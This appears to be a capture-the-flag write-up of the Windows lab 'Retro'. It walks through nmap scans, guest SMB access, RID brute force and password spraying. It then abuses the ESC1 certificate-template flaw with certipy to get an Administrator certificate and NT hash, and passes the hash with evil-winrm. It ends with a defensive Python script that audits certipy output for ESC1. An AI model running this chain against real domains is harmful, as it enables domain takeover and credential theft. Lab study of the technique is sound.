Retro
#easy #windows
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
62126/tcp open unknown syn-ack ttl 127
62133/tcp open unknown syn-ack ttl 127
62150/tcp open unknown syn-ack ttl 127
62153/tcp open unknown syn-ack ttl 127
echo $(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ','; echo) | xclip -sel clip
nmap -p 53,88,135,139,389,445,464,593,3268,3269,3389,9389,49664,49667,49669,62126,62133,62150,62153 -sCV -Pn -n -vv 10.129.77.181 -oA openPortsServicesVersion
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-27 14:29:26Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-09-27T14:31:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-26T14:20:32
| Not valid after: 2026-03-28T14:20:32
| MD5: b28f:61cd:5240:7e73:d7af:4ec3:c813:668f
| SHA-1: ab2d:49e8:cc99:3d7d:6b09:5674:afbd:9621:fad8:52d5
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-27T14:30:22+00:00
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62126/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
62133/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62150/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 28314/tcp): CLEAN (Timeout)
| Check 2 (port 17432/tcp): CLEAN (Timeout)
| Check 3 (port 62672/udp): CLEAN (Timeout)
| Check 4 (port 26701/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-09-27T14:30:23
|_ start_date: N/A
nxc smb 10.129.77.181
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
nxc smb 10.129.77.181 -u 'guest' -p ''
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\guest:
nxc smb 10.129.77.181 -u 'guest' -p '' --shares
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\guest:
SMB 10.129.77.181 445 DC [*] Enumerated shares
SMB 10.129.77.181 445 DC Share Permissions Remark
SMB 10.129.77.181 445 DC ----- ----------- ------
SMB 10.129.77.181 445 DC ADMIN$ Remote Admin
SMB 10.129.77.181 445 DC C$ Default share
SMB 10.129.77.181 445 DC IPC$ READ Remote IPC
SMB 10.129.77.181 445 DC NETLOGON Logon server share
SMB 10.129.77.181 445 DC Notes
SMB 10.129.77.181 445 DC SYSVOL Logon server share
SMB 10.129.77.181 445 DC Trainees READ
smbclient //10.129.77.181/Trainees -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 18:58:43 2023
.. DHS 0 Wed Jun 11 11:17:10 2025
Important.txt A 288 Sun Jul 23 19:00:13 2023
4659711 blocks of size 4096. 1281333 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
nxc smb 10.129.77.181 -u 'guest' -p '' --rid-brute --log nxcSmbRidBrute
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\guest:
SMB 10.129.77.181 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.77.181 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.77.181 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.77.181 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.77.181 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.77.181 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.77.181 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.77.181 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.77.181 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.77.181 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.77.181 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.77.181 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.77.181 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.77.181 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.77.181 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.77.181 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.77.181 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.77.181 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.77.181 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.77.181 445 DC 1109: RETRO\tblack (SidTypeUser)
nxc smb 10.129.77.181 -u users.txt -p trainee --continue-on-success
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [-] retro.vl\Administrator:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\Guest:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\krbtgt:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\DC$:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.77.181 445 DC [-] retro.vl\BANKING$:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\jburley:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\tblack:trainee STATUS_LOGON_FAILURE
nxc smb 10.129.77.181 -u trainee -p trainee --shares
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.77.181 445 DC [*] Enumerated shares
SMB 10.129.77.181 445 DC Share Permissions Remark
SMB 10.129.77.181 445 DC ----- ----------- ------
SMB 10.129.77.181 445 DC ADMIN$ Remote Admin
SMB 10.129.77.181 445 DC C$ Default share
SMB 10.129.77.181 445 DC IPC$ READ Remote IPC
SMB 10.129.77.181 445 DC NETLOGON READ Logon server share
SMB 10.129.77.181 445 DC Notes READ
SMB 10.129.77.181 445 DC SYSVOL READ Logon server share
SMB 10.129.77.181 445 DC Trainees READ
smbclient //10.129.77.181/Notes -U trainee
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 9 00:12:49 2025
.. DHS 0 Wed Jun 11 11:17:10 2025
ToDo.txt A 248 Sun Jul 23 19:05:56 2023
user.txt A 32 Wed Apr 9 00:13:01 2025
4659711 blocks of size 4096. 1280260 blocks available
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
smb: \> exit
cat user.txt
nxc ldap 10.129.77.181 -u 'banking$' -p password -M adcs
LDAP 10.129.77.181 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP 10.129.77.181 389 DC [+] retro.vl\banking$:password
ADCS 10.129.77.181 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.77.181 389 DC Found PKI Enrollment Server: DC.retro.vl
ADCS 10.129.77.181 389 DC Found CN: retro-DC-CA
certipy find -u 'banking$' -p password -dc-ip 10.129.77.181 -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
certipy -debug req -u 'banking$' -p password -dc-ip 10.129.77.181 -ca retro-DC-CA -template RetroClients -upn Administrator -target dc.retro.vl -key-size 4096 -sid S-1-5-21-2983547755-698260136-4283918172-500
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.77.181'
[+] DC IP: '10.129.77.181'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'dc.retro.vl'
[+] Domain: ''
[+] Username: 'BANKING$'
[+] Trying to resolve 'dc.retro.vl' at '10.129.77.181'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.77.181[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.77.181[\pipe\cert]
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[+] Found SID in SAN URL: 'S-1-5-21-2983547755-698260136-4283918172-500'
[+] Found SID in security extension: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.129.77.181
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
evil-winrm -i 10.129.77.181 -u 'administrator' -H 252fac7066d93dd009d4fd2cd0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/8/2025 8:11 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
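For the defender's side of the ESC1 finding in the certipy find output above, the following added example (not part of the original writeup and not Certipy's own code) parses that flattened text and lists the template settings that together make a template ESC1-exposed. The function names, the backslash heuristic for continuation lines, and the second template RetroClientsFixed are assumptions constructed for illustration.

```python
# Added example: audit flattened `certipy find -stdout` text for ESC1 conditions.
# Groups that every ordinary user or machine account belongs to.
BROAD_GROUPS = {"domain users", "domain computers", "authenticated users", "everyone"}

# Constructed sample: the first template is copied from the output above,
# the second is a made-up corrected variant that builds the subject from AD.
SAMPLE = r"""
Certificate Templates
0
Template Name : RetroClients
Enabled : True
Client Authentication : True
Any Purpose : False
Enrollee Supplies Subject : True
Requires Manager Approval : False
Authorized Signatures Required : 0
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
1
Template Name : RetroClientsFixed
Enabled : True
Client Authentication : True
Any Purpose : False
Enrollee Supplies Subject : False
Requires Manager Approval : False
Authorized Signatures Required : 0
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
"""


def parse_templates(text):
    """Turn 'Key : Value' lines into one dict of key -> [values] per template."""
    templates, current, last_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(("[+]", "[!]")):
            line = line[3:].strip()
        if " : " in line:
            key, value = (part.strip() for part in line.split(" : ", 1))
            if key == "Template Name":
                current = {}
                templates.append(current)
            if current is not None:
                current.setdefault(key, []).append(value)
                last_key = key
        elif current is not None and last_key and "\\" in line:
            # Assumption: a bare DOMAIN\principal line continues the previous key.
            current[last_key].append(line)
        else:
            last_key = None  # section header such as "Permissions"
    return templates


def flag(template, key):
    return template.get(key, ["False"])[0] == "True"


def esc1_findings(template):
    """Return the reasons if every ESC1 precondition holds, otherwise []."""
    broad = [p for p in template.get("Enrollment Rights", [])
             if p.split("\\")[-1].lower() in BROAD_GROUPS]
    checks = [
        (flag(template, "Enabled"), "template is enabled"),
        (flag(template, "Enrollee Supplies Subject"), "requester chooses the subject/SAN"),
        (flag(template, "Client Authentication") or flag(template, "Any Purpose"),
         "certificate is usable for authentication"),
        (not flag(template, "Requires Manager Approval"), "no manager approval"),
        (template.get("Authorized Signatures Required", ["0"])[0] == "0",
         "no authorized signature required"),
        (bool(broad), "broad enrollment rights: " + ", ".join(broad)),
    ]
    return [reason for _, reason in checks] if all(ok for ok, _ in checks) else []


if __name__ == "__main__":
    for tpl in parse_templates(SAMPLE):
        reasons = esc1_findings(tpl)
        print(tpl["Template Name"][0], "ESC1" if reasons else "ok", reasons)
```

Any single failed precondition clears the finding, which is why the constructed variant with Enrollee Supplies Subject set to False is reported as ok even though Domain Computers can still enroll.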